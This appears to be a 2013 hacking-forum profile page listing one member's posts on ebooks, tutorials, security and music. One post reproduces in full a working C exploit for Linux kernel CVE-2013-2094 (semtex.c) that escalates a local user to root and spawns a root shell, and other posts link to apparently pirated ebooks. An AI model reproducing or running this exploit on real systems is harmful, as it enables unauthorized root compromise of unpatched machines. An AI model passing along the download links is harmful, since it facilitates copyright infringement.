Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - kenjoe41

Pages: [1] 2 3 ... 10
1
Tutorials / Re: [Turorial]Internet on steroids(dnsmasq & squid)
« on: May 18, 2013, 10:34:00 pm »
Nice! Editting my ../.bashrc file like Now. 

2
eBooks / Re: BT5 cookbook
« on: May 18, 2013, 10:09:29 pm »
There are enough ebooks here to get you started. Since you worship backtrack so much, work on some linux and get some coding under your gloves-most likely C. Then you will be good to go.

3
eBooks / Re: inferno-dan brown
« on: May 18, 2013, 10:01:52 pm »
I guess that explains it all because  i was using windows Onenote to document my thoughts ATM when reading the book. Thanks for the heads-up

4
Android / Re: Android Dev. e-book?
« on: May 18, 2013, 09:02:08 pm »
A friend recommended Learning Android by Marko Gargenta.
if you wanna check it out:http://www.eglobiotraining.com/files/documents/Oreilly.Learning.Android.Mar.2011.pdf

i never started android development so i can't guarantee it's what your are looking for.

5
Hacking and Security / Re: Linux Kernel CVE-2013-2094 Local Privilege Escalation
« on: May 18, 2013, 08:45:38 pm »
Code: C
  1. /*
  2.  * linux 2.6.37-3.x.x x86_64, ~100 LOC
  3.  * gcc-4.6 -O2 semtex.c && ./a.out
  4.  * 2010 sd@fucksheep.org, salut!
  5.  *
  6.  * update may 2013:
  7.  * seems like centos 2.6.32 backported the perf bug, lol.
  8.  * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.
  9.  */
  10.  
  11. #define _GNU_SOURCE 1
  12. #include <stdint.h>
  13. #include <stdio.h>
  14. #include <stdlib.h>
  15. #include <string.h>
  16. #include <unistd.h>
  17. #include <sys/mman.h>
  18. #include <syscall.h>
  19. #include <stdint.h>
  20. #include <assert.h>
  21.  
  22. #define BASE  0x380000000
  23. #define SIZE  0x010000000
  24. #define KSIZE  0x2000000
  25. #define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))
  26.  
  27. void fuck() {
  28.   int i,j,k;
  29.   uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };
  30.   uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));
  31.   uint64_t kbase = ((uint64_t)current)>>36;
  32.   uint32_t *fixptr = (void*) AB(1);
  33.   *fixptr = -1;
  34.  
  35.   for (i=0; i<4000; i+=4) {
  36.     uint64_t *p = (void *)&current[i];
  37.     uint32_t *t = (void*) p[0];
  38.     if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
  39.     for (j=0; j<20; j++) { for (k = 0; k < 8; k++)
  40.       if (((uint32_t*)uids)[k] != t[j+k]) goto next;
  41.       for (i = 0; i < 8; i++) t[j+i] = 0;
  42.       for (i = 0; i < 10; i++) t[j+9+i] = -1;
  43.       return;
  44. next:;    }
  45.   }
  46. }
  47.  
  48. void sheep(uint32_t off) {
  49.   uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };
  50.   int fd = syscall(298, buf, 0, -1, -1, 0);
  51.   assert(!close(fd));
  52. }
  53.  
  54.  
  55. int  main() {
  56.   uint64_t  u,g,needle, kbase, *p; uint8_t *code;
  57.   uint32_t *map, j = 5;
  58.   int i;
  59.   struct {
  60.     uint16_t limit;
  61.     uint64_t addr;
  62.   } __attribute__((packed)) idt;
  63.   assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
  64.   memset(map, 0, SIZE);
  65.   sheep(-1); sheep(-2);
  66.   for (i = 0; i < SIZE/4; i++) if (map[i]) {
  67.     assert(map[i+1]);
  68.     break;
  69.   }
  70.   assert(i<SIZE/4);
  71.   asm ("sidt %0" : "=m" (idt));
  72.   kbase = idt.addr & 0xff000000;
  73.   u = getuid(); g = getgid();
  74.   assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
  75.   memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);
  76.   memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",
  77.     printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);
  78.   setresuid(u,u,u); setresgid(g,g,g);
  79.   while (j--) {
  80.     needle = AB(j+1);
  81.     assert(p = memmem(code, 1024, &needle, 8));
  82.     if (!p) continue;
  83.     *p = j?((g<<32)|u):(idt.addr + 0x48);
  84.   }
  85.   sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);
  86.   asm("int $0x4");  assert(!setuid(0));
  87.   return execl("/bin/bash", "-sh", NULL);
  88. }
  89.  
  90.  
from http://packetstormsecurity.com/files/121616/semtex.c

6
Found it on the Webs / Re: Hack-Proof internet
« on: May 18, 2013, 08:37:58 pm »
Quote from: vezzy on May 18, 2013, 08:14:11 pm
Except for one-time pads.
these are also as secure as there user
Quote from: wikipedia link=https://en.wikipedia.org/wiki/One-time_pad
In cryptography, the one-time pad (OTP) is a type of encryption which has been proven to be impossible to crack if used correctly.

7
Code Library / Re: [Python] F5 Rape
« on: May 18, 2013, 08:34:39 pm »
BTW, never used this mechanize module. better check it out

8
Code Library / Re: [Python] F5 Rape
« on: May 18, 2013, 07:48:20 pm »
Primitive but usable to skiddies who understand more like nothing.
thanks though.
You can tag that script like "Code=python]" for clarity.

9
Found it on the Webs / Re: Hack-Proof internet
« on: May 18, 2013, 07:43:07 pm »
Where quantum physics is concerned, am lost. But am sure of one thing that there will always be other was around all that since it still will be humans at the other end of the machines.

10
Found it on the Webs / Re: Online Anonymous sms sending services.
« on: May 18, 2013, 07:38:48 pm »
Thanks, if their API aint that bad, my python sms script could use a new service provider. I'll check them out.

11
eBooks / Re: inferno-dan brown
« on: May 18, 2013, 07:33:39 pm »
thanks, i was wondering what went wrong!

12
eBooks / inferno-dan brown
« on: May 18, 2013, 07:21:26 pm »
Oh boy, just finished reading Dan Brown's Inferno(new book), it falls just fine in the ranks of other Robert Lagdon series. It kind of reminds me of my high school days when i flanked the English composition tests. i love literature.
i like this guy for bringing to life the dead and his canonical exploration of history, literature, science and art.
Though the organisations and history are facts, sometimes am tempted to think of the story as a reality in some way.
i couldn't help but notice the resemblance of this plot to the Da Vinci Code, or is it just his writing style. Anyway, those who love literature, enjoy.
upload.evilzone.org/download.php?id=9835567&type=rar

13
General discussion / Re: Friday afternoon music
« on: May 18, 2013, 07:00:11 pm »
Last i heard, Kulver was up for interviews some time back. Did he turn the opportunity done or did he fail them(which is unlikely)?

14
Scripting languages / Re: [Python] Google information harvesting program
« on: May 10, 2013, 11:56:38 am »
Gonna try look at the code since I suck at the gui in python.

15
Tutorials / Re: [Turorial]Internet on steroids(dnsmasq & squid)
« on: May 10, 2013, 11:41:15 am »
I like it. Am going to try it out since my net connection sucs as he'll. Thanks.

Pages: [1] 2 3 ... 10


Intern0t SoldierX py1337 SecurityOverride programisiai iExploit
Want to be here? Contact Ande, Bluechill or Kulverstukas on the forum or at IRC.